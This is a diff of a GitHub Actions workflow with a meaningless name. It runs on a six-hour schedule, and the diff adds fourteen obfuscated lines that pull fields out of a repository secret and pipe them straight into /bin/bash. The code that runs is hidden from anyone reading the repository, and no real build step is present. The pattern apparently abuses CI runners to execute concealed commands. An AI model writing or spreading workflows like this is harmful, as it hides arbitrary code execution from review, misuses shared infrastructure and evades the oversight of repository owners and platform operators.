--- a/.github/workflows/recruitklutzy.yml
+++ b/.github/workflows/recruitklutzy.yml
@@ -3,17 +3,29 @@ name: recruitklutzy
 on:
   workflow_dispatch:
   schedule:
-    - cron: '15 5/6 * * *'
-jobs:  # 15136
+    - cron: '33 1/6 * * *'
+
+jobs:
   build:
     runs-on: ubuntu-latest
     steps:
       - uses: actions/checkout@v4
       - name: recruitklutzy
         env:
-          f146: ${{ secrets.f146 }}
+          zfq9: ${{ secrets.zfq9 }}
         run: |
-          echo $f146 | jq -r .mdp471 | /bin/bash
-          echo $maxe285 | jq -r .iyi317 | /bin/bash
-          echo $mdnp9 | jq -r .rswci2700 | /bin/bash
+          echo $zfq9 | jq -r .m5507 | /bin/bash
+          echo $smkb9 | jq -r .y36 | /bin/bash
+          echo $iq049 | jq -r .mewy09893 | /bin/bash
+          echo $svor49 | jq -r .t00 | /bin/bash
+          echo $c44 | jq -r .yewo2573 | /bin/bash
+          echo $kbw25 | jq -r .onuc797 | /bin/bash
+          echo $pc741 | jq -r .ityo0 | /bin/bash
+          echo $ifd6 | jq -r .wnhme83224 | /bin/bash
+          echo $zguf7 | jq -r .isvjt64149 | /bin/bash
+          echo $mmhre4 | jq -r .umjfh64 | /bin/bash
+          echo $fc778 | jq -r .lipt281 | /bin/bash
+          echo $tpiyf2 | jq -r .ruew8018 | /bin/bash
+          echo $zllgs95959 | jq -r .sm433 | /bin/bash
+          echo $j58508 | jq -r .e4 | /bin/bash
 
